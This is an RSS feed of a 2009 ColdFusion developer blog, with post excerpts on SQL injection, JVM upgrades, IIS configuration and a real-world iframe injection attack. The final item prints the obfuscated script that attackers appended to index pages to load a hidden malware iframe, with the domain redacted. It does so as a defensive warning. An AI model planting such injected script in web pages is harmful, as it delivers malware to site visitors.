<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2enclosuresfull.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:media="http://search.yahoo.com/mrss/" xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" version="2.0">
			<channel>
			<title>Coldfusion Muse</title>
			<link>http://www.coldfusionmuse.com/index.cfm</link>
			<description>Daily Musings from CFG Mark Kruger</description>
			<language>en-us</language>
			<pubDate>Sun, 12 Jul 2009 07:56:36 -0500</pubDate>
			<lastBuildDate>Mon, 15 Jun 2009 12:30:00 -0500</lastBuildDate>
			<generator>BlogCFC</generator>
			<docs>http://blogs.law.harvard.edu/tech/rss</docs>
			<managingEditor>mkruger@cfwebtools.com</managingEditor>
			<webMaster>mkruger@cfwebtools.com</webMaster>
			
			
			
			
			
			<media:copyright>2006</media:copyright><media:thumbnail url="http://mkruger.cfwebtools.com/images/cfwt_tiny.jpg" /><media:keywords>Coldfusion, cfmx, web server troubleshooting, ms sql, java, web development</media:keywords><media:category scheme="http://www.itunes.com/dtds/podcast-1.0.dtd">Technology/Developers</media:category><itunes:owner><itunes:email>mkruger@cfwebtools.com</itunes:email><itunes:name>Mark A. Kruger</itunes:name></itunes:owner><itunes:author>Mark A. Kruger</itunes:author><itunes:explicit>no</itunes:explicit><itunes:image href="http://mkruger.cfwebtools.com/images/cfwt_tiny.jpg" /><itunes:keywords>Coldfusion, cfmx, web server troubleshooting, ms sql, java, web development</itunes:keywords><itunes:subtitle>Weekly musings on Coldfusion, technology, life and the meaning of it all.</itunes:subtitle><itunes:summary>Weekly musings on Coldfusion, technology, life and the meaning of it all.</itunes:summary><itunes:category text="Technology"><itunes:category text="Developers" /></itunes:category><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" href="http://feeds.feedburner.com/ColdfusionMuse" type="application/rss+xml" /><item>
				<title>My Funny Val()entine and SQLi</title>
				<link>http://www.coldfusionmuse.com/index.cfm/2009/6/15/coldfusion.val.sqli</link>
				<description>
				
				&lt;p&gt;
	Regular readers know I'm always on the lookout for interesting issues regarding SQL Injection and ColdFusion. This year has been a banner year for injection on ColdFusion sites and if you are not on the Cfqueryparam bandwagon yet I have one more example of a code that might &lt;em&gt;seem&lt;/em&gt; to be inoculated but is not. It has to do with the use of val( )....
&lt;/p&gt;
				 [More]
				
				</description>
				
				<category>ColdFusion</category>
				
				<category>Coldfusion Security</category>
				
				<pubDate>Mon, 15 Jun 2009 12:30:00 -0500</pubDate>
				<guid>http://www.coldfusionmuse.com/index.cfm/2009/6/15/coldfusion.val.sqli</guid>
				
			<dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Mark A. Kruger</dc:creator></item>
			
		 	
			
			
			<item>
				<title>Ask-a-Muse: How Do I Upgrade the JVM?</title>
				<link>http://www.coldfusionmuse.com/index.cfm/2009/6/11/upgrade.ColdFusion.JVM</link>
				<description>
				
				&lt;div style="margin-left: 20px; border-left: 3px solid #CCCCCC; padding-left: 4px;"&gt;

&lt;p&gt;&lt;em&gt;Muse Reader Rob Asks:&lt;/em&gt;&lt;br&gt;	
	I have a silly question. How exactly &lt;em&gt;do&lt;/em&gt; you upgrade the JVM on your ColdFusion server?  My server is on Win2k3 x64 and the JVM version is 1.6.0_04.  Do you specify it manually in the jvm.config file? 
&lt;/p&gt;
&lt;/div&gt;
&lt;p style="padding-top: 15px;"&gt;
	I'm glad you asked this question because it reminds me that I sometimes give advice without any follow through - which is the same problem I have with my 8 iron. Upgrading the JVM on a windows installation is pretty easy. Just remember that you will need the correct Java Runtime for your platform and ColdFusion version. Rob specified Win2k3 x64 so I assume he means he is running ColdFusion 8 enterprise 64 bit - in which case the target version is 1.6 update 14 (or 1.6.0_14).  I usually start at the Sun Java &lt;a href="http://java.sun.com/javase/downloads/index.jsp"&gt;download&lt;/a&gt; page. Once you have the right version in hand the rest is easy.
&lt;/p&gt;
				 [More]
				
				</description>
				
				<category>ColdFusion</category>
				
				<category>Coldfusion Troubleshooting</category>
				
				<pubDate>Thu, 11 Jun 2009 12:41:00 -0500</pubDate>
				<guid>http://www.coldfusionmuse.com/index.cfm/2009/6/11/upgrade.ColdFusion.JVM</guid>
				
			<dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Mark A. Kruger</dc:creator></item>
			
		 	
			
			
			<item>
				<title>Certain JPGs Can Crash Your ColdFusion 8 Server</title>
				<link>http://www.coldfusionmuse.com/index.cfm/2009/6/10/javax.imageio.jpg.crash.jvm</link>
				<description>
				
				&lt;p&gt;
	This issue was brought to my attention by Adrian Lynch on &lt;a href="http://www.houseoffusion.com"&gt;CF-Talk&lt;/a&gt;. It seems that if you use the new image functions in ColdFusion 8 against certain kinds of JPG images you can actually cause your JVM to crash. If you have code that uses the latest image functions to handle uploaded images you should definitely take note of this post. I cannot yet see how a user might take advantage of this bug to penetrate your server, but a malicious (or even non-malicious) user could easily perform a denial of service attack and cause your CF server to go up and down like Jack LaLanne doing jumping jacks. So if you fit into that category (handling uploaded images using CF 8 image functionality) here's the scoop.
&lt;/p&gt;
				 [More]
				
				</description>
				
				<category>ColdFusion</category>
				
				<category>Coldfusion Troubleshooting</category>
				
				<pubDate>Wed, 10 Jun 2009 09:41:00 -0500</pubDate>
				<guid>http://www.coldfusionmuse.com/index.cfm/2009/6/10/javax.imageio.jpg.crash.jvm</guid>
				
			<dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Mark A. Kruger</dc:creator></item>
			
		 	
			
			
			<item>
				<title>Connector Problems - Win2k8, IIS7 and Multi-Server ColdFusion 8 x 64 Bit</title>
				<link>http://www.coldfusionmuse.com/index.cfm/2009/6/9/IIS7.Connector.Problem</link>
				<description>
				
				&lt;p&gt;
I have not yet had this problem specifically, but it was pointed out by CFG Tom Forrest who spent some time wrangling with it. He was trying to use the connector widget to connect IIS 7 sites to ColdFusion instances (running in Multi-Server Mode). He reports as follows:
&lt;/p&gt;

&lt;div style="margin-left: 20px; border-left: 3px solid #CCCCCC; padding-left: 4px;"&gt;

&lt;p&gt;
The connector refused to install anything into IIS.  When I started it, the first window would appear.  When I clicked "add" I would see something to the effect of, &lt;em&gt;Installing required IIS7 components.  It may take 2 to 5 minutes to complete.&lt;/em&gt; The window that allows you to set all the parameters would open, and you could select any of your running CF servers.  However, you couldn't select any of the IIS sites that were created. Assuming you give up and click ok, allowing it to "install to all" you would get an error window stating &lt;em&gt;error creating IIS application extensions ColdFusion&lt;/em&gt;.
&lt;/p&gt;
&lt;/div&gt;
&lt;p&gt;
	According to Tom the fix is to install the IIS 6 Management Compatibility role service. This service allows an IIS 7 server to "act like" an IIS 6 server. Once installed the configuration tool began to work. 
&lt;/p&gt;
&lt;p&gt;
	While I haven't had this specific problem, I have noticed that a number of other things are easier and more familiar with the IIS Management Compatibility installed. Thanks Tom.
&lt;/p&gt;
				
				
				</description>
				
				<category>ColdFusion</category>
				
				<category>Coldfusion Troubleshooting</category>
				
				<pubDate>Tue, 09 Jun 2009 16:09:00 -0500</pubDate>
				<guid>http://www.coldfusionmuse.com/index.cfm/2009/6/9/IIS7.Connector.Problem</guid>
				
			<dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Mark A. Kruger</dc:creator></item>
			
		 	
			
			
			<item>
				<title>Ask-a-Muse: Killing the Immortal Thread</title>
				<link>http://www.coldfusionmuse.com/index.cfm/2009/6/9/killing.threads</link>
				<description>
				
				&lt;p&gt;&lt;em&gt;Muse Reader Joe Asks:&lt;/em&gt;&lt;br&gt;	
	How do I kill a request? Every other day or so there will be a runaway process that cannot be killed. Clicking on the red exclamation in the monitoring tool does not give an error but it does not kill the request either. My question is how to kill this process? 
&lt;/p&gt;
&lt;/div&gt;
&lt;p style="padding-top: 15px;"&gt;
	Ah the immortal thread - like a god coming down from Mt. Olympus and laughing with his (or her) hands on his mighty hips (see why I chose "his"? ... "her mighty hips" ... well, I just didn't want to go there). Such threads are mind bogglingly frustrating. In actual fact, there are some requests spawned by ColdFusion that &lt;em&gt;may not be able to be terminated&lt;/em&gt; by ColdFusion. For the long version read on McDuff.
&lt;/p&gt;
				 [More]
				
				</description>
				
				<category>ColdFusion</category>
				
				<category>Coldfusion Troubleshooting</category>
				
				<pubDate>Tue, 09 Jun 2009 09:18:00 -0500</pubDate>
				<guid>http://www.coldfusionmuse.com/index.cfm/2009/6/9/killing.threads</guid>
				
			<dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Mark A. Kruger</dc:creator></item>
			
		 	
			
			
			<item>
				<title>Google Wave - The Next Thing?</title>
				<link>http://www.coldfusionmuse.com/index.cfm/2009/6/3/google.wave</link>
				<description>
				
				&lt;p&gt;
	Like most geeks I love technology. I'm always reading about the cutting edge of research. I can become as engrossed in an online white paper about nano-technology as I am in my favorite TV Show - which is a toss up between the gritty AMC Drama &lt;a href="http://www.amctv.com/originals/breakingbad/"&gt;Breaking Bad&lt;/a&gt; and the light hearted and endearing (although occasionaly gruesome) &lt;a href="http://abc.go.com/primetime/pushingdaisies/index"&gt;Pushing Daisies&lt;/a&gt; with the irrepresible Kristin Chenoweth as former Jockey-turned-waitress Olive Snook. Who else could make unrequited love seem so appealing and delicious... but I digress. This "forward leaning" interest in technology tends to create a momentum for me and even for my company (&lt;a href="http://www.cfwebtools.com"&gt;CF Webtools&lt;/a&gt;) that makes me prone to try new things. So when Google announces a ground breaking new paradigm for collaboration my temptation is to say "count me in". In case you missed the hype I'm talking about &lt;a href="http://code.google.com/apis/wave/"&gt;Google Wave&lt;/a&gt; which was previewed at Google I/O. 
&lt;/p&gt;
&lt;p&gt;
	Google Wave aims to combine elements of email, chat, blogging, micro-blogging, collaboration, source control, and social networking into a single interface that claims to draw in all the best features of these tools while eliminating some of the annoying drawbacks. The paradigm for Google Wave moves away from "messages" and toward a "conversation". That might seem too abstract to matter, but such idioms are important because they give us an anchor - a point of reference for understanding something new. 
&lt;/p&gt;
&lt;p&gt;
	Let me say at the outset that I'm &lt;em&gt;positively&lt;/em&gt; inclined toward this product (at least, what I've seen of it). I can see how it would benefit my own team in many ways. I'm already thinking of how I might enhance our vast, custom tracking system using the Wave Protocol. One of the best things about Wave isthe protocol layer and integration strategy. So I am not against the product - indeed I'm rooting for it. I would love to get rid of our hodgepodge of tools in favor of one elegant way of collaborating. Still, I see some problems for Wave on the horizon. So if you want the contrarian view read on...
&lt;/p&gt;
				 [More]
				
				</description>
				
				<category>Humor and Life</category>
				
				<pubDate>Wed, 03 Jun 2009 11:49:00 -0500</pubDate>
				<guid>http://www.coldfusionmuse.com/index.cfm/2009/6/3/google.wave</guid>
				
			<dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Mark A. Kruger</dc:creator></item>
			
		 	
			
			
			<item>
				<title>Fun With Qw...Uh...Acme Communications</title>
				<link>http://www.coldfusionmuse.com/index.cfm/2009/5/15/fun.with.phone.company</link>
				<description>
				
				&lt;p&gt;
 Muse readers and friends who know me well understand that I'd rather have my nether regions bitten by a Laplander than deal with sales people over the phone. However, as a (usually) caring person, I try not to let my personal ire show too forcefully when one of these hard working sales folks call. I know they are just doing their job. Recently however, one phone company has caused me to rethink my "no throttling the sales person" position. I won't say their name but it begins with a Q and ends with est - and in a twist it does not have a U in it. I guess these folks don't know how to spell NO either because they keep calling.
&lt;/p&gt;
&lt;p&gt;
	Usually it is pretty typical stuff like "are you happy with your phone service". I'm actually &lt;em&gt;not&lt;/em&gt; happy with my phone service but I prefer not to discuss it with strangers over the phone. Still I'm usually pretty nice and say something like "we are not ready to make a change right now." The last 2 times however, the salesman has chosen a new tack. They are now trying to wheedle additional proprietary information out of me. Today things did not go so well....
&lt;/p&gt;
				 [More]
				
				</description>
				
				<category>Humor and Life</category>
				
				<pubDate>Fri, 15 May 2009 11:20:00 -0500</pubDate>
				<guid>http://www.coldfusionmuse.com/index.cfm/2009/5/15/fun.with.phone.company</guid>
				
			<dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Mark A. Kruger</dc:creator></item>
			
		 	
			
			
			<item>
				<title>Cfinclude for Good or Evil</title>
				<link>http://www.coldfusionmuse.com/index.cfm/2009/5/14/cfinclude.arbitrary.file.extensions</link>
				<description>
				
				&lt;p&gt;
	Yesterday I was doing some searches on a sick server to troubleshoot the &lt;a href="http://www.coldfusionmuse.com/index.cfm/2009/4/23/Iframe.VBscript"&gt;Iframe Injection&lt;/a&gt; issue. A user had posted some additional information regarding a file that appeared on his server that had this issue. The file was named "fection.cfm" so we now know the hacker casually removes his prefixes (or I should say 'emoves his 'efixes). I began my search by looking for the file specifically, then moved on to look for the string "cfexecute" in all of the *.cfm files. But that got me thinking. A clever hacker might know some things about ColdFusion. He could in fact, further obscure his code with some knowledge of cfinclude and IIS. Such a technique can be used to secure your code as well. You can create code that is only runnable by ColdFusion using cfinclude. Here's the skinny.
&lt;/p&gt;
				 [More]
				
				</description>
				
				<category>ColdFusion</category>
				
				<category>Coldfusion Security</category>
				
				<pubDate>Thu, 14 May 2009 09:23:00 -0500</pubDate>
				<guid>http://www.coldfusionmuse.com/index.cfm/2009/5/14/cfinclude.arbitrary.file.extensions</guid>
				
			<dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Mark A. Kruger</dc:creator></item>
			
		 	
			
			
			<item>
				<title>Help an Aspiring Animator</title>
				<link>http://www.coldfusionmuse.com/index.cfm/2009/4/29/corey.animation</link>
				<description>
				
				&lt;p&gt;
	My nephew is 16 or 17 and wants to become an animation/game programmer. He's been working using a product called &lt;a href="http://www.blender.org/"&gt;blender&lt;/a&gt;. It seems to be pretty polished for an open source project. I was impressed with the movie galleries on the site and especially with the "Big Buck the Bunny" and "Elephants Dream" - pretty awesome cgi stuff. Most of you who read my blog know that I am &lt;em&gt;not&lt;/em&gt; qualified to do (or judge) anything artistic. My wife won't even let me choose which soap to put in the shower. So I thought I would be a good uncle and ask my readers if they have a take on Blender. Is it "up to snuff" for an IDE? Is there something more powerful or better he should be using (and why)? 
&lt;/p&gt;
&lt;p&gt;
	He gave me an animation which I have converted to FLV. You can check it out at this &lt;a href="Javascript:openBr('/corey/corey-robo.html','CoreyRobo','width=550,height=450,scrollbars=no,resizable=yes')"&gt;link&lt;/a&gt;. Take a look and see what you think. I think he has talent. It needs audio, but it's pretty smooth and he's thought of a number of things - backlighting, reflections and shadows etc. What I &lt;em&gt;don't&lt;/em&gt; know is if it's "out of the box" thinking or the result of working his way through tutorials. I would appreciate any comments you can muster, but please be helpful and not too critical (remember when you were just starting out :). If you have a comment you want to send without posting it "live" feel free to use the ask-a-muse box in the upper right or email me directly at mkruger at cfwebtools.com. 
&lt;/p&gt;
				
				
				</description>
				
				<category>Design</category>
				
				<pubDate>Wed, 29 Apr 2009 10:04:00 -0500</pubDate>
				<guid>http://www.coldfusionmuse.com/index.cfm/2009/4/29/corey.animation</guid>
				
			<dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Mark A. Kruger</dc:creator></item>
			
		 	
			
			
			<item>
				<title>Passing an Array to a .NET Webservice</title>
				<link>http://www.coldfusionmuse.com/index.cfm/2009/4/27/array.CF.to.NET</link>
				<description>
				
				&lt;p&gt;
	Here's a problem that will leave you scratching your head should you ever run into it. Consider a simple .NET web service that requires an "array of strings". The goal was to make use of a web service API published by &lt;a href="http://www.smartertools.com"&gt;Smarter Mail&lt;/a&gt;. I wanted a programmatic way of adding email aliases - groups of emails that function under a single address. The web service methods provided by the smarter mail API could not be simpler. Each request requires a username, password, domain and then additional stuff to make it work. For example, the "GetAlias()" function allowed me to pass in a domain and alias and get a list of emails already associated with that alias.
&lt;/p&gt;
&lt;p&gt;
	The problem came when it was time to add or update an alias. The argument for "addresses" to pass to the .NET service looked like "an array of strings" (that's how the help docs referred to is as well). The node in the XML looked pretty simple:
&lt;/p&gt;
&lt;code&gt;
&lt;AddAlias xmlns="http://tempuri.org/"&gt;
      &lt;AuthUserName&gt;string&lt;/AuthUserName&gt;
      &lt;AuthPassword&gt;string&lt;/AuthPassword&gt;
      &lt;DomainName&gt;string&lt;/DomainName&gt;
      &lt;AliasName&gt;string&lt;/AliasName&gt;
      &lt;Addresses&gt;
        &lt;string&gt;string&lt;/string&gt;
        &lt;string&gt;string&lt;/string&gt;
      &lt;/Addresses&gt;
    &lt;/AddAlias&gt;
&lt;/code&gt;
&lt;p&gt;
Now I can think of several ways to create an array of strings in ColdFusion so I started giving it the old college try. Unfortunately each attempt ended in failure. I could not figure out how to get a data type instantiated in CF to match the data type that .NET expected. I ended up experimenting with several different approaches to the array syntax.
&lt;/p&gt;
				 [More]
				
				</description>
				
				<category>ColdFusion</category>
				
				<pubDate>Mon, 27 Apr 2009 21:09:00 -0500</pubDate>
				<guid>http://www.coldfusionmuse.com/index.cfm/2009/4/27/array.CF.to.NET</guid>
				
			<dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Mark A. Kruger</dc:creator></item>
			
		 	
			
			
			<item>
				<title>The Inquisitive Mind</title>
				<link>http://www.coldfusionmuse.com/index.cfm/2009/4/27/inquisitive.mind</link>
				<description>
				
				&lt;p&gt;
	A misconception about technical folks is that they are fully left-brained and incapable of true creativity. Anyone on the inner circle of geekdome knows this is not the case, but folks on the outside looking in often only see the engineering skills - attention to detail and minutia, obsession with systems and process, and a penchant for pocket protectors. Of course in the last 10 years you can add flip flops, body piercings and a sort of pigeon English consisting of acronyms, techno-babble and quips from Monty Python and the Princess Bride. That should tell you something in itself. There's more to IT folks than numbers and obscure discussions about the best Star Trek Movie (Khaaaan!!!!). That got me thinking.
&lt;/p&gt;
				 [More]
				
				</description>
				
				<category>Project Management</category>
				
				<category>Humor and Life</category>
				
				<pubDate>Mon, 27 Apr 2009 11:32:00 -0500</pubDate>
				<guid>http://www.coldfusionmuse.com/index.cfm/2009/4/27/inquisitive.mind</guid>
				
			<dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Mark A. Kruger</dc:creator></item>
			
		 	
			
			
			<item>
				<title>VB Script For Iframe Injection Attack</title>
				<link>http://www.coldfusionmuse.com/index.cfm/2009/4/23/Iframe.VBscript</link>
				<description>
				
				&lt;p&gt;
Thanks to Nate from &lt;a href="http://www.houseoffusion.com"&gt;CF-Talk&lt;/a&gt; I have a copy of the malicious VBS script that is doing the damage. If you are being victimized by this attack and you need to see the script for whatever purpose, let me know and I will make sure you get a copy. I now it goes without saying, but just don't run it :).
&lt;/p&gt;
&lt;p&gt;
 Meanwhile there is some consensus, given the root access of this code, that an infected server cannot be trusted even after a thorough cleaning. Dave Watts and Tom Chiverton both gave such advice. While it's not always possible and it's a huge hassle, it might be the best solution to bite the bullet and do it.
&lt;/p&gt;
				
				
				</description>
				
				<category>ColdFusion</category>
				
				<category>Security</category>
				
				<pubDate>Thu, 23 Apr 2009 11:14:00 -0500</pubDate>
				<guid>http://www.coldfusionmuse.com/index.cfm/2009/4/23/Iframe.VBscript</guid>
				
			<dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Mark A. Kruger</dc:creator></item>
			
		 	
			
			
			<item>
				<title>Iframe Injection Follow Up</title>
				<link>http://www.coldfusionmuse.com/index.cfm/2009/4/21/Iframe.Followup.IIS.Config</link>
				<description>
				
				&lt;p&gt;
	For those of you who have been following the Iframe injection attack saga (see &lt;a href="http://www.coldfusionmuse.com/index.cfm/2009/4/16/iframe.insertion.hack"&gt;Iframe Insertion on Index.* Home pages&lt;/a&gt;) I have an update. I would like to thank one of my readers named Kumar for referring me to &lt;a href="http://www.blackhat.com/presentations/bh-dc-09/ValSmith/BlackHat-DC-09-valsmith-colin-Dissecting-Web-Attacks.pdf"&gt;this excellent article&lt;/a&gt; (a PDF File) on Black Hat. The article seems to pinpoint the origin and nature of the attack. The document describes an attack in depth with multiple steps (just as we had speculated). The first step was an SQLi attempt. But failing that the attacker compromised the server in a rather ingenious fashion.
&lt;ul&gt;
	&lt;li&gt;Using an image upload capability he uploaded a file to the server that "looked" like an image but was not.&lt;/li&gt;
	&lt;li&gt;The file (containing executable code) was then hit with GET and POST requests.&lt;/li&gt;
	&lt;li&gt;The payload of the get and post requests was able to set up scheduled tasks to append the JS code to "index.*" files on a timed basis.&lt;/li&gt;
&lt;/ul&gt;
&lt;/p&gt;
&lt;p&gt;
	This file that was uploaded was a CDX file. On a properly configured IIS server this attack would fail to succeed. Here's why.
&lt;/p&gt;
				 [More]
				
				</description>
				
				<category>ColdFusion</category>
				
				<category>Security</category>
				
				<pubDate>Tue, 21 Apr 2009 09:29:00 -0500</pubDate>
				<guid>http://www.coldfusionmuse.com/index.cfm/2009/4/21/Iframe.Followup.IIS.Config</guid>
				
			<dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Mark A. Kruger</dc:creator></item>
			
		 	
			
			
			<item>
				<title>Review: Foundeo Web Application Firewall</title>
				<link>http://www.coldfusionmuse.com/index.cfm/2009/4/17/foundeo.WAF</link>
				<description>
				
				&lt;p&gt;
	Coldfusion Guru and all around super geek &lt;a href="http://www.petefreitag.com/"&gt;Pete Freitag&lt;/a&gt; was nice enough to let me check out his new "Web Application Firewall" (see &lt;a href="http://foundeo.com/security/"&gt;this link&lt;/a&gt; for more info). This product serves as a Coldfusion based security filter for all requests coming to an application. I was impressed with the approach Pete takes. After the Init the code ran smoothly and did not appreciably increase my page load time (always a concern when you are "wrapping" your application in something). If you use Pete's system you will pretty much guarantee that your site will be protected from a high percentage of known attacks. Overall I give the application an A for innovation and organization, a B+ for installation and a C- on the price. If you want to know more read on.
&lt;/p&gt;
				 [More]
				
				</description>
				
				<category>ColdFusion</category>
				
				<category>Product Reviews</category>
				
				<pubDate>Fri, 17 Apr 2009 17:44:00 -0500</pubDate>
				<guid>http://www.coldfusionmuse.com/index.cfm/2009/4/17/foundeo.WAF</guid>
				
			<dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Mark A. Kruger</dc:creator></item>
			
		 	
			
			
			<item>
				<title>Iframe Insertion on Index.* Home pages</title>
				<link>http://www.coldfusionmuse.com/index.cfm/2009/4/16/iframe.insertion.hack</link>
				<description>
				
				&lt;p&gt;
There's a hack that's beginning to be active that targets pages named "index.*". Actually it sounds rather like an old hack that is resurfacing. Since many ColdFusion sites use this convention for the home page this attack tends to hit quite a few ColdFusion sites that are vulnerable. The attack appends a script like this one to the bottom of each "index.*" page:
&lt;code&gt;
&lt;sc ript&gt; 
var applstrna0 = " ; 
var applstrna1 = "rame src=http://***Domain Host Name****"; 
var applstrna2 = ".com/bb/faq.htm"; 
var applstrna3 = " width=100 height=0&gt; ; 
var applstrna4 = "frame&gt;"; 
document.write(applstrna0+applstrna1+applstrna2+applstrna3+applstrna4); 
&lt;/script&gt; 
&lt;/code&gt;

Please note that I have not included the actual url of this attack. The domain includes the string "said7". I am only making sure I mention said7 so that folks searching for info on this attack can find this specific post and possibly be helped. I have no wish to benefit the said7 effort and I hope they all get dysentery and spend the weekend in the latrine.
&lt;/p&gt;
&lt;p&gt;
 As you can see the script itself is pretty simple. It writes out an invisible Iframe to the bottom of the page. The target of the Iframe attempts to download a trojan or malware to the users machine. This attack is insidious and I have yet to discover the origin. But I do know a few things about it - and how to prevent it from continuing. One important thing to note, if you have this problem and Google indexes your sites and sees these pages they will flag your site. Browsers like Firefox use the Google service to throw up a big "malware" warning. &lt;/p&gt;
&lt;p&gt;
The following article details the attack and the notes I've gathered about it. Some day soon I hope to post a more definitive who, what, when and why post about it. To gather the following notes I'm indebted to the folks on the CF-Talk List (&lt;a href="http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164"&gt;this thread&lt;/a&gt;), Nathan, Nick, Jason, Scott, Don and probably a few others I am forgetting. I can't give away too much info here - but please accept my thanks.
&lt;/p&gt;
				 [More]
				
				</description>
				
				<category>Hosting and Networking</category>
				
				<category>Security</category>
				
				<pubDate>Thu, 16 Apr 2009 14:18:00 -0500</pubDate>
				<guid>http://www.coldfusionmuse.com/index.cfm/2009/4/16/iframe.insertion.hack</guid>
				
			<dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Mark A. Kruger</dc:creator></item>
			
		 	
			<copyright>2006</copyright><media:credit role="author">Mark A. Kruger</media:credit><media:rating>nonadult</media:rating></channel></rss>
